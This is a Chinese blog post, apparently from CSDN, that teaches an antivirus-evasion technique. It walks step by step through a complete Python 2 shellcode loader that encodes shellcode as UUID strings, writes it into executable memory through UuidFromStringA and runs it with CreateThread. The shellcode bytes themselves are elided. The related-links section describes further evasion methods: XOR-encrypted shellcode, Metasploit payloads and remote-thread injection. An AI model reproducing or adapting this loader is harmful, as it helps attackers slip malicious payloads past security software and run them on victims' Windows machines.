[免杀]基于python的uuid加载器

已于 2023-10-25 15:32:18 修改
阅读量4k 收藏
点赞数
分类专栏: 免杀 文章标签: 安全 python web安全
于 2022-04-02 17:31:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/123924031
版权

文章目录

uuid

UUID: 通用唯一标识符 ( Universally Unique Identifier ), 对于所有的UUID它可以保证在空间和时间上的唯一性. 它是通过MAC地址, 时间戳, 命名空间, 随机数, 伪随机数来保证生成ID的唯一性, 有着固定的大小( 128 bit ). 它的唯一性和一致性特点使得可以无需注册过程就能够产生一个新的UUID. UUID可以被用作多种用途, 既可以用来短时间内标记一个对象, 也可以可靠的辨别网络中的持久性对象.

字节转换uuid

python中可以利用uuid库中的uuid.UUID()方法来将字节转换为uuid值
在这个函数中,一个\xf4是一个字节,需要16个字节才能转换成一个uuid值。
ps:当剩下的字节不足16时,可以在尾部通过添加\x00填充至16字节

import uuid

bincode=b'\xf4\x48.......\x00'
uuid_list = []
for i in range(0,len(bincode),16):
	hex_byte = bincode[i:i+16]
	uid = uuid.UUID(bytes_le=hex_byte) 
	uuid_list.append(str(uid))

申请内存

上述字节转换为uuid时是由16字节转成一个uuid值,所以申请内存时,申请的内存大小为uuid个数的16倍

ptr = ctypes.windll.kernel32.VirtualAlloc(0, len(uuid_list)*16, 0x1000, 0x40)

写入内存

UuidFromStringA
UuidFromStringA函数可以将字符串UUID转换为二进制UUID写入内存
api函数原型:https://docs.microsoft.com/en-us/windows/win32/api/rpcdce/nf-rpcdce-uuidfromstringa

RPC_STATUS UuidFromStringA(
  RPC_CSTR StringUuid,
  UUID     *Uuid
);

StringUuid 参数指向 UUID的字符串表示形式的指针
Uuid 参数以二进制形式返回指向UUID的指针

ptr是内存指针,表示从从指定指针位置写入
ptr1 +=16,是每一次写入后指针位置的跳转,每写入一个uuid二进制需要将指针移动16个字节

ptr1 = ptr
for j in uuid_list:
    ctypes.windll.Rpcrt4.UuidFromStringA(j, ptr1)
    ptr1 += 16

创建进程

接下来就是创建一个进程从shellcode的首地址开始执行即可

handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

代码

#coding:utf-8
import uuid
import ctypes


shellcode = b'\xfc\x48\x83........\00\x00\x00'
uuid_list = []
for i in range(0,len(shellcode),16):
    cut_bytes = shellcode[i:i+16]
    uid = uuid.UUID(bytes_le=cut_bytes)
    uuid_list.append(str(uid))
print(uuid_list)


ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64

ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(uuid_list)*16), ctypes.c_int(0x3000), ctypes.c_int(0x40))

ptr1 = ptr
for j in uuid_list:
    ctypes.windll.Rpcrt4.UuidFromStringA(j, ptr1)
    ptr1 += 16
handle = ctypes.windll.kernel32.CreateThread(0, 0, ptr, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

ps:环境python2
【开玩笑没关系,但是切记言多必失。】

3tefanie丶zhou
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python 加密 shellcode 免杀
Sylon的博客
08-04 3368
Python 加密 shellcode 免杀 环境准备: Windows7 32 位系统; Shellcode 使用 kali linux Metasploit 生成 shellcode Windows7 需要安装的软件: Python2.7, pip install pyinstaller pywin32-217.win32-py2.7.exe ...
uuid从32个文本(0-e)字符转化为16个二进制字符,以及BASE64编码的互相转化 c++源代码
l1t的专栏
10-27 3465
// a64.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include #include #include #include #include static void to64frombits(unsigned char *out, const unsigned char *i
[免杀]基于python的ipv4加载
3tefanie丶zhou的博客
04-07 3825
【每当你想要批评什么人的时候,你要记住并不是所有人都有你所拥有的优势。】
uuid:简单的UUID生成
02-11
@ freeasin / uuid 一个简单的UUID v4生成模块 起源 该模块基于对的最小字节答案。 该答案已修改为: 受到好评 在浏览和双方的NodeJS运行浏览打包为ES6模块 用法 npm install @freeasin/uuid 节点JS const { v4 } = require("@freeasin/uuid"); 通过模块加载输入打字稿/浏览 import { v4 } from "@freeasin/uuid"; 没有模块加载的浏览 使用@freeasin/uuid/dist/es6.js作为ES6模块 AMD,UMD,UNPKG等在哪里? 这不是ES6模块的重点吗? 如有需要,也许我们会在途中增加其他包装... 编译中 作为构建的一部分,我们正在删除和重命名文件,因此POSIX和Windows使用不同的构建路径( cough WSL
python中的字节bytes类型 与PHP中的二进制数据的转化
托塔天王的博客
10-27 575
今天有一个场景 python中 使用string.bytes 转为字节类型存储到数据库中,现在我想使用PHP 进行写入,恐一直无法找到对应的处理逻辑,今天总算可以了 写下来与大家一起分享!经过实际测试,基本上将加密字符串存储后,反解出来的字符串就是生成的uuidPython与PHP的上面的写法是等价的。
利用Python执行ShellCode
2201_75774378的博客
05-05 589
D:\网安\sike\ShellCode_Loader>Shellcode_encryption.exe shellcode_xor.c。将生成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = ‘密文Shellcode’ 处。运行:Shellcode_encryption.exe payload.c 对ShellCode代码进行加密处理。使用Python 64位版加载。生成x64位的ShellCode。使用64位版Python加载Python加载实现免杀
python uuid模块使用实例
09-22
Python中的`uuid`模块是一个非常实用的工具,用于生成全局唯一的标识符(UUID),它遵循国际标准ISO/IEC 11578:1996和RFC 4122。UUID是一个128位的数字,通常用16进制表示,长度为32个字符。在Python中,`uuid`模块...
Python生成短uuid的方法实例详解
09-20
Python编程语言中,UUID(Universally Unique Identifier)是一种用于生成全局唯一标识符的标准方法,通常生成的是32位的16进制字符串,加上破折号一共36个字符。UUID按照RFC 4122标准定义,分为五种版本,其中最...
python生成并处理uuid的实现方式
12-20
UUID(Universally Unique Identifier)是通用唯一识别码,在许多领域用作标识,...下面就简单说明一下python是如何生成UUID的: python有一个模块叫做uuid,导入它就可以使用它的四个方法了。注意这四个方法依次是
Python使用uuid库生成唯一标识ID
09-17
主要介绍了Python使用uuid模块生成唯一标识ID,需要的朋友可以参考下
免杀简述2(二次编译shellcode\远程加载shellcode\shellcode远程线程注入\内存申请优化\管道技术)
热门推荐
Shanfenglan's blog
08-09 33万+
二次编译 也可以理解成shellcode混淆,将shellcode执行前进行各种加密,然后执行的时候进行解密。Xor就是一个例子。原理是先将加密后的shellcode写入程序中,然后再在程序里面写入shellcode解密程序,这样子将shellcode混淆后,特征码等各种数值就会改变,可以绕过大部分的静态查杀,加密方法不限制,自己写也是可以的。Exp:xor加密shellcode代码: #include stdio.h #define KEY 0x97 //进行异或的字符unsigned char
Windows下基础免杀技术
MachineGunJoe666
09-04 1647
例如,CS可以直接生成各种格式的shellcode。
java.util.UUID.fromString() 方法使用详解
taocplasf的博客
08-31 2万+
一、什么是UUID:         UUID:(Universally Unique Identifier):通用唯一识别码,也可以翻译成普遍识别码。UUID 的目的,是让分布式系统中的所有元素,都能有唯一的辨识资讯,而不需要透过中央控制端来做辨识资讯的指定。如此一来,每个人都可以建立不与其它人冲突的 UUID。在这样的情况下,就不需考虑数据库建立时的名称重复问题。目前最广泛应用的 UUID
Java: UUID.fromString()方法
weixin_43837555的博客
03-20 5990
一、方法描述 Java中UUID类的fromString(String name)方法用于根据标准字符串表示形式创建UUID。 方法中的参数name可以理解为UUID的名字,即:要是字符串为我好想吃红烧肉,那么方法就会报错~ Example: // Java program to demonstrate the example // of UUID fromString(String na) method of UUID import java.util.*; public class From
java uuid静态方法_Java UUID fromString()方法与示例
cumt30111的博客
07-19 1373
java uuid静态方法 UUID类fromString()方法 (UUID Class fromString() method) fromString() method is available in java.util package. fromString()方法在java.util包中可用。 fromString() method is used to return UUID fro...
UUID的使用,String类型转换成Integer类型--小白福音
LiPengBo666的博客
01-11 1万+
一,UUID String id = UUID.randomUUID().toString().replace("-", ""); 128位长的数字,一般用16进制表示生成32位字符串,一般用作table(数据库表)的主键UUID.randomUUID().toString(); 生成的格式为:550E8400-E29B-11D4-A716-446655440000; UUID的优
java uuid.fromstring,如何正确使用UUID.fromString方法?
weixin_36098968的博客
02-16 490
I am trying to read/write these ble characteristics:Right now, I'm trying to read AA01*I am using this library to do it.Here's my code:private void connectToSensorTag(RxBleDevice rxBleDevice) {rxBleDe...
pythonuuid
最新发布
09-20
pythonuuid模块提供了UUID类和四个函数(uuid1, uuid3, uuid4, uuid5)来生成不同版本的UUID。需要注意的是,Python中没有uuid2()这个函数。如果需要带有名字的唯一性要求,最好使用uuid3或uuid5。可以通过导入uuid模块,并调用相应的函数来生成UUID。 代码示例: ``` import uuid name = "test_name" namespace = "test_namespace" print(uuid.uuid1()) # 生成版本1的UUID print(uuid.uuid3(namespace, name)) # 生成版本3的UUID print(uuid.uuid4()) # 生成版本4的UUID print(uuid.uuid5(namespace, name)) # 生成版本5的UUID ``` 总结起来,Pythonuuid模块可以用来生成全局唯一的标识符UUID,对应的函数和类可以根据不同的需求生成不同版本的UUID

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值